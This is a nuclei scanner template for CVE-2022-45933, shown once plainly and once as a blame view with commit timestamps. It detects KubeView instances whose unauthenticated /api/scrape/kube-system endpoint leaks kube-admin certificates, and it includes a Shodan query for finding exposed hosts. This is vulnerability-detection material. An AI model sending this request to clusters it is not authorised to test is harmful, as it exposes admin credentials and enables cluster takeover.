nuclei-templates/cves/2022/CVE-2022-45933.yaml

id: CVE-2022-45933

info:
  name: KubeView - Information disclosure
  author: For3stCo1d
  severity: high
  description: |
    KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
  reference:
    - https://github.com/benc-uk/kubeview/issues/95
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
  classification:
    cve-id: CVE-2022-45933
  metadata:
    verified: true
    shodan-query: http.title:"KubeView"
  tags: cve,cve2022,kubeview,kubernetes,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/scrape/kube-system"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BEGIN CERTIFICATE'
          - 'END CERTIFICATE'
          - 'kubernetes.io'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`id: CVE-2022-45933`

			`info:`
			`name: KubeView - Information disclosure`
			`author: For3stCo1d`
			`severity: high`
			`description: \|`
			`KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."`
			`reference:`
			`- https://github.com/benc-uk/kubeview/issues/95`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933`
Update CVE-2022-45933.yaml 2022-12-01 17:44:42 +00:00			`classification:`
			`cve-id: CVE-2022-45933`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`metadata:`
Update CVE-2022-45933.yaml 2022-11-29 09:06:05 +00:00			`verified: true`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`shodan-query: http.title:"KubeView"`
			`tags: cve,cve2022,kubeview,kubernetes,exposure`

			`requests:`
Update CVE-2022-45933.yaml 2022-11-29 09:06:05 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api/scrape/kube-system"`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-45933.yaml 2022-11-29 09:10:50 +00:00			`- 'BEGIN CERTIFICATE'`
			`- 'END CERTIFICATE'`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`- 'kubernetes.io'`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`